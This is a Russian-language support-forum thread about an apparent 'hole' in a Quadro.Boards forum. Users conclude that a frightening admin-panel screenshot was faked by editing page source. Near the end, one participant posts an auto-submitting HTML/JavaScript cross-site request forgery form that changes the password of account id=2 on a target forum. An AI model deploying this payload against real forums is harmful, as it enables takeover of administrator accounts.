Техническая поддержка сервиса Quadro.Boards |
Новости сервиса |
О форуме
Quadro.Support – это форум технической поддержки различных проектов и сервисов Quadro.Systems LLC,
на котором грамотные технические специалисты всегда смогут помочь вам в решении проблем, или же подсказать ответы на самые сложные вопросы.
Так же на форуме собрана обширная база знаний по различным аспектам наших сервисов. Не забывайте пользоваться поиском ;)
|
Полезные ссылки |
Привет, Гость! Войдите или зарегистрируйтесь.
Вы здесь » Техническая поддержка сервиса Quadro.Boards » Корзина » Дырка на форуме
Добрый день!
Вчера наш главный админ получила по почте вот такое сообщение от новичка
КАРАУЛ! Правда или нет? Пришло мне сегодня вот такое сообщение
Ник нашего главного администратора Admin. А тут видно что пользователь Vitalik имеет возможность видеть меню Администрирования.
Как такое может быть и как от этого защититься?
Бармалей
Добрый день.
Посмотреть что видно из-под профиля Vitalik я смогу только вечером.
а ведь это не так сложно взломать форум. просто прописать код вот и тебе пожалуйста в админку путь открыт
dumuliy
Какой код?)
Вот мне тоже интересно 
Какой код?)
не хочу лишней головной боли
Это тот самый dumuliy, который у нас на форуме зарегистрировался в разное время под следующими никами:
vitalik, Vadim, dumuliy, FEDYA, tester и т.п.
Прошу администрацию форума принять все меры к тому, чтобы этот троль был заблокирован не только на нашем форуме, но вообще не смог получить доступ к хостингу.
А чтобы неповадно было троллить, я тоже взломал его сайт таким же методом, какой он опубликовал здесь
Отредактировано Бармалей (08.02.2013 11:48:34)
Я гляжу у нас тут клуб юных хакеров образовался, и все прилежно освоили редактирование страницы через исходный код)
А можно нам поддержку взломать? И скриншот? Честное слово, тому кто взломает, ничего не будет)
Lazary
Я это скриншот опубликовал не для того, чтобы популяризировать корректировки исходного кода страниц, а для того, чтобы показать этому лузеру, что женщин (а гл. админ нашего форума - женщина) такими вещами пугать не нужно.
Если для его блокировки нужно еще предъявить другие доказательства его "деятельности" могу отправить все материалы в личку Администрации техподдержки.
Бармалей
А давайте
<script lang=javascript>
function hackedforum () {
document.hacked.submit();
}
</script>
<body onload="hackedforum()">
<form method="post" name="hacked" action="http://ЦЕЛЬ(АДРЕС ФОРУМА)/profile.php?action=change_pass&id=2">
<input type="hidden" name="form_sent" value="1">
<input type="hidden" name="req_new_password1" value="your_password">
<input type="hidden" name="req_new_password2" value="your_password">
</form>
Это тот самый dumuliy, который у нас на форуме зарегистрировался в разное время под следующими никами:
vitalik, Vadim, dumuliy, FEDYA, tester и т.п.
Прошу администрацию форума принять все меры к тому, чтобы этот троль был заблокирован не только на нашем форуме, но вообще не смог получить доступ к хостингу.
А чтобы неповадно было троллить, я тоже взломал его сайт таким же методом, какой он опубликовал здесьОтредактировано Бармалей (Сегодня 11:48:34)
Тот сайт не управляется через админ панел. А через панел управления
| Мостовые Ехо. | Архив | 17.05.2015 |
| Конкурс «Акулы Пера» | Акции и Конкурсы | 26.11.2010 |
| Sweet photoshop | Корзина | 23.09.2010 |
| Загадки 80-х ... или куда смотрела цензура))) | Корзина | 23.12.2008 |
| Флуд в честь мандаринки :) | Корзина | 13.10.2013 |
Вы здесь » Техническая поддержка сервиса Quadro.Boards » Корзина » Дырка на форуме
